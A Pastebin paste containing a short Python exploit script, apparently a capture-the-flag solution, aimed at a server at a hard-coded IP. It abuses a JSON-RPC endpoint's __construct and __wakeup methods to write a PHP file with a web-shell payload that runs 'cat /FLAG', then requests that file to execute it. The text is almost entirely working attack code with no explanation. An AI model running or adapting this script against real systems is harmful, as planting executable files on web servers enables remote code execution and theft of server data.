Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # coding: UTF-8
- import requests
- headers = { "Content-Type" : "application/x-www-form-urlencoded" }
- filename = "bb.php"
- payload = "<?php echo `cat /FLAG`;?>"
- data = 'rpc_json_call=[{"jsonrpc": "2.0", "id":1, "method": "__construct", "params":{"log_dir":"/var/www/%s", "debug": true, "state":"%s" }},{"jsonrpc": "2.0", "id":1, "method": "__wakeup", "params":{}}]' % (filename, payload)
- print requests.post( "http://109.233.61.11:8880/",
- data=data,
- headers=headers ).content
- print
- print requests.get("http://109.233.61.11:8880/%s" % filename).content
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement